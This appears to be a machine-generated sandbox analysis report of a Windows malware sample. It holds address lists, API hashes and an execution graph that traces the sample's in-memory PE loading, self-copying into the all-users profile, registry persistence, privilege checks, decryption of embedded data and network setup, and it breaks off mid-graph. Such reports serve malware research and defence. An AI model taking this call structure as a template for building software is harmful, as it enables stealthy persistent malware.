                                                                                                                                                                                                                                                                                                        0x0041697f
                                                                                                                                                                                                                                                                                                        0x0041697f
                                                                                                                                                                                                                                                                                                        0x00416965
                                                                                                                                                                                                                                                                                                        0x00416969
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041696e
                                                                                                                                                                                                                                                                                                        0x00416980
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416980
                                                                                                                                                                                                                                                                                                        0x00416976
                                                                                                                                                                                                                                                                                                        0x00416984
                                                                                                                                                                                                                                                                                                        0x00416987
                                                                                                                                                                                                                                                                                                        0x0041698a
                                                                                                                                                                                                                                                                                                        0x00416990
                                                                                                                                                                                                                                                                                                        0x00416993
                                                                                                                                                                                                                                                                                                        0x00416998
                                                                                                                                                                                                                                                                                                        0x004169e6
                                                                                                                                                                                                                                                                                                        0x00416a30
                                                                                                                                                                                                                                                                                                        0x00416a30
                                                                                                                                                                                                                                                                                                        0x00416a33
                                                                                                                                                                                                                                                                                                        0x00416a3c
                                                                                                                                                                                                                                                                                                        0x00416a41
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416a41
                                                                                                                                                                                                                                                                                                        0x004169f3
                                                                                                                                                                                                                                                                                                        0x004169fa
                                                                                                                                                                                                                                                                                                        0x00416a02
                                                                                                                                                                                                                                                                                                        0x00416a09
                                                                                                                                                                                                                                                                                                        0x00416a48
                                                                                                                                                                                                                                                                                                        0x00416a4b
                                                                                                                                                                                                                                                                                                        0x00416a4e
                                                                                                                                                                                                                                                                                                        0x00416a57
                                                                                                                                                                                                                                                                                                        0x00416a5c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416a5c
                                                                                                                                                                                                                                                                                                        0x00416a0b
                                                                                                                                                                                                                                                                                                        0x00416a0e
                                                                                                                                                                                                                                                                                                        0x00416a13
                                                                                                                                                                                                                                                                                                        0x00416a15
                                                                                                                                                                                                                                                                                                        0x00416a1c
                                                                                                                                                                                                                                                                                                        0x00416a1c
                                                                                                                                                                                                                                                                                                        0x00416a1e
                                                                                                                                                                                                                                                                                                        0x00416a25
                                                                                                                                                                                                                                                                                                        0x004169b1
                                                                                                                                                                                                                                                                                                        0x004169b1
                                                                                                                                                                                                                                                                                                        0x004169b4
                                                                                                                                                                                                                                                                                                        0x004169c8
                                                                                                                                                                                                                                                                                                        0x004169cb
                                                                                                                                                                                                                                                                                                        0x004169d2
                                                                                                                                                                                                                                                                                                        0x004169d7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004169d7
                                                                                                                                                                                                                                                                                                        0x0041699a
                                                                                                                                                                                                                                                                                                        0x0041699f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004169a7
                                                                                                                                                                                                                                                                                                        0x004169ae
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004169ae
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0041698A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 004169B4
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c33ec732f80b659cce35f99fb264f15b02028685b48b232e4bea87b4582e7bd9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1550a3b30af1b3d5739506e796b0290a9769e07061fc54df4d8527e034a952a5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c33ec732f80b659cce35f99fb264f15b02028685b48b232e4bea87b4582e7bd9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35316FB06002018FCB10AF69D5C46AB7BB0EF44350F1A857AEC459F34AE738D895CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4020351045-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4610c1a5b9857c503adf5da19f6fa4e820977606d10de2c50b457a4da0e04751
                                                                                                                                                                                                                                                                                                        • Instruction ID: 15fce7b54c8e5e1fc0f85ba65380c6ebfde49fb6f69f57a2b6804990dbcebb8c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4610c1a5b9857c503adf5da19f6fa4e820977606d10de2c50b457a4da0e04751
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0018B70B00201CFC700EFB8E58452ABBE0BF44304B94497EE889D7390E778E859CB5A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 682475483-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2c84c1ffd8b1c17e096c6591a1ead9b1f70f7a80ca5ad25b355e63b48a2b1e91
                                                                                                                                                                                                                                                                                                        • Instruction ID: aa3a49ff768a6b075f2888eed2ac29caeab34b7e920cbfe53a71fda84f8aa413
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c84c1ffd8b1c17e096c6591a1ead9b1f70f7a80ca5ad25b355e63b48a2b1e91
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6F06D76A00704ABC720BFB9A94855ABBB4FF84350F450539DC9593300D738B819CADA
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                        Execution Coverage:12.6%
                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                                                        Total number of Nodes:1806
                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:32
                                                                                                                                                                                                                                                                                                        execution_graph 16018 40f1c0 16019 40f1d5 16018->16019 16020 40f2b9 16018->16020 16042 414700 16019->16042 16022 414330 12 API calls 16020->16022 16024 40f2d5 16022->16024 16025 40f2df calloc 16024->16025 16030 40f307 16025->16030 16031 40f30e 16025->16031 16027 40f1f4 16028 40f1f8 16027->16028 16033 40f20d calloc 16027->16033 16037 40f24b 16028->16037 16038 40f242 16028->16038 16029 40f1ea 16029->16025 16029->16027 16034 40f22f 16030->16034 16032 414330 12 API calls 16031->16032 16035 40f32a 16032->16035 16033->16034 16049 413af0 16034->16049 16077 414660 16037->16077 16038->16037 16039 414330 12 API calls 16038->16039 16039->16037 16043 414715 16042->16043 16044 40f1dd 16042->16044 16045 414752 16043->16045 16046 41472c 16043->16046 16044->16029 16060 414330 strlen 16044->16060 16045->16044 16048 414772 Sleep 16045->16048 16047 414730 Sleep 16046->16047 16047->16045 16047->16047 16048->16044 16048->16048 16081 413550 16049->16081 16051 413b03 16052 413b10 calloc 16051->16052 16053 413b07 16051->16053 16052->16053 16054 413b2f 16052->16054 16053->16038 16055 413b55 CreateSemaphoreA 16054->16055 16056 413b93 16054->16056 16057 413b84 16055->16057 16058 413bb6 GetLastError 16055->16058 16059 413b98 free 16056->16059 16057->16053 16058->16059 16059->16038 16095 40db20 16060->16095 16063 41441d 16064 41441e FindAtomA 16063->16064 16065 414433 malloc 16064->16065 16066 4144b7 16064->16066 16068 414450 AddAtomA 16065->16068 16067 4142c0 GetAtomNameA 16066->16067 16076 4144ca 16067->16076 16071 414471 16068->16071 16069 414492 ReleaseMutex CloseHandle 16069->16029 16097 4142c0 16071->16097 16074 41448a free 16074->16069 16075 4144ce memset 16075->16069 16075->16076 16076->16069 16078 414675 16077->16078 16079 40f258 16077->16079 16078->16079 16080 414688 Sleep 16078->16080 16080->16079 16080->16080 16082 413560 16081->16082 16083 4135b8 16081->16083 16085 414700 2 API calls 16082->16085 16084 414330 12 API calls 16083->16084 16084->16082 16086 413568 16085->16086 16087 413579 16086->16087 16088 413588 16086->16088 16090 414660 Sleep 16087->16090 16089 414330 12 API calls 16088->16089 16091 4135a4 16089->16091 16092 413581 16090->16092 16093 414660 Sleep 16091->16093 16092->16051 16094 4135b1 16093->16094 16094->16051 16096 40db2d memcpy CreateMutexA WaitForSingleObject 16095->16096 16096->16063 16096->16064 16098 4142d7 16097->16098 16099 4142d8 GetAtomNameA 16097->16099 16098->16099 16100 4142f0 16099->16100 16100->16074 16100->16075 16101 a20000 16111 a209fc GetPEB 16101->16111 16104 a209fc GetPEB 16108 a20281 16104->16108 16105 a209e4 16106 a20483 GetNativeSystemInfo 16106->16105 16107 a204b0 VirtualAlloc 16106->16107 16109 a204c9 16107->16109 16108->16105 16108->16106 16113 10002720 16109->16113 16112 a20275 16111->16112 16112->16104 16116 10001000 16113->16116 16119 10001030 LoadLibraryW GetProcAddress 16116->16119 16161 10001b30 16119->16161 16122 10001091 SetLastError 16155 1000102b 16122->16155 16123 100010a3 16124 10001b30 SetLastError 16123->16124 16125 100010b9 16124->16125 16126 100010f0 16125->16126 16127 100010de SetLastError 16125->16127 16125->16155 16128 10001111 16126->16128 16129 100010ff SetLastError 16126->16129 16127->16155 16130 1000111c SetLastError 16128->16130 16132 1000112e GetNativeSystemInfo 16128->16132 16129->16155 16130->16155 16133 100011bc 16132->16133 16134 100011d7 SetLastError 16133->16134 16135 100011e9 16133->16135 16134->16155 16164 10001800 VirtualAlloc 16135->16164 16136 10001202 16137 1000123d GetProcessHeap RtlAllocateHeap 16136->16137 16165 10001800 VirtualAlloc 16136->16165 16138 10001257 SetLastError 16137->16138 16139 1000127b 16137->16139 16138->16155 16143 10001b30 SetLastError 16139->16143 16140 10001222 16140->16137 16141 1000122e SetLastError 16140->16141 16141->16155 16144 100012fb 16143->16144 16145 10001302 16144->16145 16166 10001800 VirtualAlloc 16144->16166 16237 100016c0 16145->16237 16146 10001320 16167 10001b50 16146->16167 16149 1000136b 16149->16145 16173 100021a0 16149->16173 16153 100013ca 16153->16145 16154 100013eb 16153->16154 16154->16155 16156 100013ff GetPEB 16154->16156 16155->16105 16194 24e3b00 16156->16194 16162 10001070 16161->16162 16163 10001b3b SetLastError 16161->16163 16162->16122 16162->16123 16162->16155 16163->16162 16164->16136 16165->16140 16166->16146 16169 10001b7d 16167->16169 16168 10001b30 SetLastError 16170 10001c32 16168->16170 16169->16168 16171 10001be9 16169->16171 16170->16171 16245 10001800 VirtualAlloc 16170->16245 16171->16149 16174 100021dd IsBadHugeReadPtr 16173->16174 16184 100013b5 16173->16184 16176 10002207 16174->16176 16174->16184 16176->16184 16246 10001840 LoadLibraryA 16176->16246 16178 10002239 SetLastError 16178->16184 16179 1000224d 16248 10001a20 16179->16248 16182 10002273 SetLastError 16182->16184 16184->16145 16188 10001e80 16184->16188 16185 1000229d 16185->16184 16186 100023ae SetLastError 16185->16186 16186->16184 16191 10001eba 16188->16191 16189 10001fe5 16190 10001d10 2 API calls 16189->16190 16193 10001fc1 16190->16193 16191->16189 16191->16193 16263 10001d10 16191->16263 16193->16153 16195 24e3b0d 16194->16195 16271 24e2ed0 16195->16271 16197 24e3b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 16274 24e4510 16197->16274 16199 24e400a ExitProcess 16200 24e3b54 16200->16199 16292 24e5700 16200->16292 16204 24e3b9f 16326 24e9400 16204->16326 16210 24e3be1 16343 24e5e00 CreateMutexA GetLastError 16210->16343 16212 24e3beb StrStrIA 16344 24e1120 16212->16344 16223 24e3c92 16392 24e5b50 16223->16392 16227 24e3df8 16232 24e3e30 16227->16232 16432 24e78d0 16227->16432 16230 24e4020 257 API calls 16230->16232 16231 24e3fed Sleep 16231->16232 16232->16230 16232->16231 16235 24e3f09 16232->16235 16419 24e7970 16232->16419 16235->16232 16236 24e3f62 VirtualFree 16235->16236 16436 24e42e0 16235->16436 16441 24e4020 16235->16441 16236->16235 16238 100016d2 16237->16238 16239 100016d7 16237->16239 16238->16155 16240 100019d0 VirtualFree 16239->16240 16243 1000170b 16240->16243 16241 10001770 GetProcessHeap HeapFree 16241->16238 16243->16241 16244 100019d0 VirtualFree 16243->16244 16244->16241 16245->16171 16247 10001857 16246->16247 16247->16178 16247->16179 16249 10001a35 16248->16249 16250 10001a2c 16248->16250 16255 10001a43 16249->16255 16256 100019f0 VirtualAlloc 16249->16256 16257 10001900 16250->16257 16253 10001a51 16253->16255 16260 100019d0 16253->16260 16255->16182 16255->16185 16256->16253 16258 10001910 VirtualQuery 16257->16258 16259 1000190c 16257->16259 16258->16259 16259->16249 16261 100019d9 VirtualFree 16260->16261 16262 100019ea 16260->16262 16261->16262 16262->16255 16264 10001d29 16263->16264 16268 10001d1f 16263->16268 16265 10001d37 16264->16265 16266 10001d9d VirtualProtect 16264->16266 16265->16268 16270 10001820 VirtualFree 16265->16270 16266->16268 16268->16191 16270->16268 16464 24e3090 GetPEB 16271->16464 16273 24e2edf 16273->16197 16275 24e47e6 16274->16275 16276 24e4528 16274->16276 16275->16200 16276->16275 16277 24e455b GetModuleFileNameA CreateFileA 16276->16277 16277->16275 16278 24e45a4 GetFileSize 16277->16278 16279 24e45c6 VirtualAlloc 16278->16279 16280 24e47d0 16278->16280 16279->16280 16281 24e45ef ReadFile 16279->16281 16280->16275 16282 24e47d9 CloseHandle 16280->16282 16283 24e4625 16281->16283 16291 24e466f 16281->16291 16282->16275 16284 24e4637 FindCloseChangeNotification 16283->16284 16283->16291 16465 24e47f0 16284->16465 16285 24e47b2 VirtualFree 16285->16280 16288 24e4681 VirtualFree 16290 24e469f 16288->16290 16289 24e47f0 15 API calls 16289->16290 16290->16289 16290->16291 16291->16280 16291->16285 16293 24e3b84 16292->16293 16294 24e5717 16292->16294 16313 24e5a00 16293->16313 16485 24e8f80 16294->16485 16300 24e5773 16554 24e5cd0 16300->16554 16303 24e57d1 16304 24e57f9 GetEnvironmentVariableA 16303->16304 16305 24e57e6 GetAllUsersProfileDirectoryA 16303->16305 16306 24e5810 wnsprintfA CreateFileA 16304->16306 16305->16306 16306->16293 16307 24e5867 GetFileSize 16306->16307 16308 24e5918 FindCloseChangeNotification 16307->16308 16309 24e5886 VirtualAlloc 16307->16309 16308->16293 16309->16308 16310 24e58ab ReadFile 16309->16310 16311 24e5904 VirtualFree 16310->16311 16312 24e58e4 16310->16312 16311->16308 16312->16308 16314 24e5b44 16313->16314 16315 24e5a18 16313->16315 16314->16204 16315->16314 16316 24e5a3a lstrcpyA 16315->16316 16579 24e5930 16316->16579 16318 24e5a62 16319 24e5a74 lstrlenA 16318->16319 16319->16314 16320 24e5a8c lstrcpyA lstrlenA lstrlenA 16319->16320 16320->16314 16321 24e5abf lstrcatA RegCreateKeyExA 16320->16321 16322 24e5b0a RegCloseKey 16321->16322 16323 24e5b16 16321->16323 16324 24e5b37 lstrlenA 16322->16324 16325 24e5b25 lstrcpyA 16323->16325 16324->16314 16325->16324 16327 24e3bcf 16326->16327 16330 24e941a 16326->16330 16332 24e99f0 GetCurrentProcess OpenProcessToken 16327->16332 16330->16327 16331 24e9502 lstrcpyA CharUpperA 16330->16331 16583 24e8bb0 16330->16583 16599 24e9650 16330->16599 16331->16330 16333 24e9a1f GetTokenInformation 16332->16333 16334 24e3bd7 16332->16334 16335 24e9b76 CloseHandle 16333->16335 16336 24e9a50 GetTokenInformation 16333->16336 16341 24e6060 GetModuleFileNameA 16334->16341 16335->16334 16336->16335 16337 24e9a85 CreateWellKnownSid EqualSid 16336->16337 16337->16334 16338 24e9ad4 CreateWellKnownSid EqualSid 16337->16338 16338->16334 16339 24e9b0a CreateWellKnownSid EqualSid 16338->16339 16339->16334 16340 24e9b40 CreateWellKnownSid EqualSid 16339->16340 16340->16334 16340->16335 16342 24e6091 16341->16342 16342->16210 16343->16212 16345 24e113a 16344->16345 16359 24e1289 16344->16359 16346 24e1144 lstrlenA 16345->16346 16345->16359 16347 24e1156 lstrlenA 16346->16347 16346->16359 16348 24e1168 16347->16348 16347->16359 16349 24e118a GetEnvironmentVariableA 16348->16349 16350 24e1177 GetAllUsersProfileDirectoryA 16348->16350 16351 24e11a1 wnsprintfA lstrcmpiA 16349->16351 16350->16351 16352 24e11db 16351->16352 16353 24e1216 16351->16353 16352->16353 16354 24e11e3 CopyFileA SetFileAttributesA lstrcpyA 16352->16354 16608 24e97a0 GetProcessHeap HeapAlloc 16353->16608 16354->16353 16356 24e1220 lstrcpyA lstrcpyA CreateThread 16357 24e12a3 16356->16357 16356->16359 16609 24e12d0 16356->16609 16358 24e97c0 2 API calls 16357->16358 16358->16359 16360 24e5e30 16359->16360 16361 24e5e5d 16360->16361 16362 24e5e64 RegOpenKeyExA 16360->16362 16361->16362 16363 24e3c39 16362->16363 16364 24e5e8c RegQueryValueExA 16362->16364 16371 24e6cf0 16363->16371 16365 24e5edc 16364->16365 16366 24e5ebc 16364->16366 16367 24e5f15 RegCloseKey 16365->16367 16615 24e9bd0 16365->16615 16366->16365 16368 24e5ece RegDeleteValueA 16366->16368 16367->16363 16368->16365 16372 24e6d0c 16371->16372 16373 24e6d13 RegOpenKeyExA 16371->16373 16372->16373 16374 24e3c4d 16373->16374 16375 24e6d3a RegQueryValueExA 16373->16375 16378 24e5f30 16374->16378 16376 24e6d84 RegCloseKey 16375->16376 16377 24e6d70 RegDeleteValueA 16375->16377 16376->16374 16377->16376 16619 24e7d20 16378->16619 16381 24e5f99 RegOpenKeyExA 16383 24e3c58 16381->16383 16384 24e5fc1 RegQueryValueExA 16381->16384 16382 24e5f92 16382->16381 16389 24e9b90 16383->16389 16385 24e5ffc 16384->16385 16386 24e6041 RegCloseKey 16385->16386 16387 24e9bd0 QueryPerformanceCounter 16385->16387 16386->16383 16388 24e6020 RegSetValueExA 16387->16388 16388->16386 16390 24e3c71 WSAStartup 16389->16390 16391 24e9ba0 QueryPerformanceCounter 16389->16391 16390->16199 16390->16223 16391->16390 16393 24e3dac 16392->16393 16394 24e5b67 16392->16394 16406 24e8a70 16393->16406 16394->16393 16395 24e5b7b lstrlenA lstrlenA 16394->16395 16396 24e5ba3 16395->16396 16397 24e5bab StrStrIA 16396->16397 16398 24e5be0 VirtualAlloc 16396->16398 16397->16396 16399 24e5bdc 16397->16399 16398->16393 16400 24e5c09 16398->16400 16399->16398 16401 24e5c1f StrStrIA 16400->16401 16402 24e5c7f 16400->16402 16401->16402 16403 24e5c39 lstrcpynA 16401->16403 16402->16393 16404 24e5c91 VirtualAlloc 16402->16404 16403->16400 16404->16393 16405 24e5cad 16404->16405 16405->16393 16407 24e8a87 16406->16407 16408 24e8ba3 16406->16408 16407->16408 16409 24e8ab9 CryptAcquireContextA 16407->16409 16408->16227 16410 24e8add GetLastError 16409->16410 16411 24e8b12 16409->16411 16413 24e8aef 16410->16413 16414 24e8af8 CryptAcquireContextA 16410->16414 16411->16408 16412 24e8b1c CryptImportKey 16411->16412 16415 24e8b97 CryptReleaseContext 16412->16415 16416 24e8b41 CryptImportKey 16412->16416 16413->16411 16413->16414 16414->16411 16415->16408 16417 24e8b8d CryptDestroyKey 16416->16417 16418 24e8b68 CryptDecrypt CryptDestroyKey 16416->16418 16417->16415 16418->16417 16420 24e7ae9 16419->16420 16421 24e7987 VirtualAlloc 16419->16421 16420->16232 16421->16420 16422 24e79b6 16421->16422 16621 24ea400 16422->16621 16424 24e7ad8 VirtualFree 16424->16420 16426 24e8a70 9 API calls 16427 24e7a15 16426->16427 16427->16424 16428 24e7a20 VirtualAlloc 16427->16428 16428->16424 16430 24e7a5a 16428->16430 16429 24e7ad0 16429->16424 16430->16429 16431 24e7a89 inet_ntoa wnsprintfA 16430->16431 16431->16430 16433 24e7965 16432->16433 16434 24e78e4 16432->16434 16433->16232 16434->16433 16435 24e7927 inet_ntoa wnsprintfA 16434->16435 16435->16434 16437 24e42fa VirtualAlloc 16436->16437 16438 24e44fd 16436->16438 16437->16438 16440 24e44a3 16437->16440 16438->16235 16440->16438 16628 24e92e0 16440->16628 16442 24e42d7 16441->16442 16443 24e4034 16441->16443 16442->16235 16443->16442 16444 24e405f InitializeCriticalSection CreateEventA 16443->16444 16445 24e409f 16444->16445 16446 24e42cd DeleteCriticalSection 16445->16446 16447 24e40ab EnterCriticalSection 16445->16447 16446->16442 16448 24e40da 16447->16448 16449 24e40bb VirtualFree 16447->16449 16450 24e40f3 ResetEvent LeaveCriticalSection CreateThread 16448->16450 16451 24e40e0 TerminateThread 16448->16451 16449->16448 16636 24e97a0 GetProcessHeap HeapAlloc 16450->16636 16637 24e4ac0 16450->16637 16451->16450 16453 24e4221 WaitForMultipleObjects WaitForSingleObject 16454 24e424f WaitForSingleObject 16453->16454 16455 24e424b 16453->16455 16456 24e4267 TerminateThread 16454->16456 16457 24e4273 EnterCriticalSection 16454->16457 16455->16454 16456->16457 16459 24e42a2 LeaveCriticalSection 16457->16459 16460 24e4283 VirtualFree 16457->16460 16458 24e413a 16458->16453 16462 24e41d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 16458->16462 16461 24e97c0 2 API calls 16459->16461 16460->16459 16463 24e42bb 16461->16463 16462->16458 16650 24e4ba0 CoInitialize 16462->16650 16463->16446 16464->16273 16466 24e4665 16465->16466 16467 24e4807 16465->16467 16466->16288 16466->16290 16466->16291 16467->16466 16468 24e4814 CryptAcquireContextA 16467->16468 16469 24e4834 GetLastError 16468->16469 16472 24e4856 16468->16472 16470 24e4841 CryptAcquireContextA 16469->16470 16469->16472 16470->16472 16471 24e4a9f CryptReleaseContext 16471->16466 16472->16466 16472->16471 16473 24e48be CryptCreateHash 16472->16473 16474 24e48f9 CryptHashData 16473->16474 16475 24e4a90 16473->16475 16476 24e4919 CryptDeriveKey 16474->16476 16477 24e4a83 CryptDestroyHash 16474->16477 16475->16471 16476->16477 16478 24e494a CryptDecrypt CryptDestroyKey 16476->16478 16477->16475 16478->16477 16479 24e4995 CryptCreateHash 16478->16479 16479->16477 16480 24e49b7 CryptHashData 16479->16480 16481 24e49da CryptGetHashParam 16480->16481 16482 24e4a76 CryptDestroyHash 16480->16482 16481->16482 16483 24e4a11 CryptGetHashParam 16481->16483 16482->16477 16483->16482 16484 24e4a3e 16483->16484 16484->16482 16486 24e572e GetModuleFileNameA 16485->16486 16487 24e8f9a 16485->16487 16525 24e1ca0 CreateToolhelp32Snapshot 16486->16525 16487->16486 16488 24e8fed GetVersionExA 16487->16488 16489 24e9266 16488->16489 16490 24e9005 GetSystemInfo 16488->16490 16489->16486 16491 24e926c lstrcatA 16489->16491 16492 24e901c 16490->16492 16493 24e9115 16490->16493 16491->16486 16495 24e9025 lstrcatA 16492->16495 16496 24e9042 16492->16496 16494 24e9110 16493->16494 16497 24e912b 16493->16497 16498 24e9174 16493->16498 16564 24e9290 GetModuleHandleA GetProcAddress 16494->16564 16495->16494 16500 24e904b lstrcatA 16496->16500 16501 24e9068 16496->16501 16504 24e914e 16497->16504 16505 24e9134 lstrcatA 16497->16505 16502 24e917d 16498->16502 16503 24e91c3 16498->16503 16500->16494 16501->16494 16507 24e90a1 GetSystemMetrics 16501->16507 16515 24e9087 lstrcatA 16501->16515 16508 24e9186 lstrcatA 16502->16508 16509 24e91a0 16502->16509 16503->16494 16519 24e91ef 16503->16519 16520 24e91d5 lstrcatA 16503->16520 16504->16494 16510 24e9157 lstrcatA 16504->16510 16505->16494 16516 24e90ad lstrcatA 16507->16516 16517 24e90c7 GetSystemMetrics 16507->16517 16508->16494 16509->16494 16518 24e91a9 lstrcatA 16509->16518 16510->16494 16511 24e9228 lstrlenA 16513 24e9259 lstrlenA 16511->16513 16514 24e9239 lstrcatA lstrcatA 16511->16514 16512 24e9219 lstrcatA 16512->16511 16513->16489 16514->16513 16515->16494 16516->16494 16521 24e90ed 16517->16521 16522 24e90d3 lstrcatA 16517->16522 16518->16494 16519->16494 16523 24e91f8 lstrcatA 16519->16523 16520->16494 16521->16494 16524 24e90f8 lstrcatA 16521->16524 16522->16494 16523->16494 16524->16494 16526 24e1cc9 Process32First 16525->16526 16527 24e1e51 16525->16527 16528 24e1cee GetCurrentProcessId 16526->16528 16529 24e1e44 CloseHandle 16526->16529 16543 24e9d20 16527->16543 16530 24e1d04 16528->16530 16529->16527 16531 24e1d12 16530->16531 16532 24e1d20 Process32Next 16530->16532 16531->16529 16533 24e1d44 Process32First 16531->16533 16532->16530 16532->16531 16533->16529 16534 24e1d5f 16533->16534 16535 24e1e29 Process32Next 16534->16535 16536 24e1d71 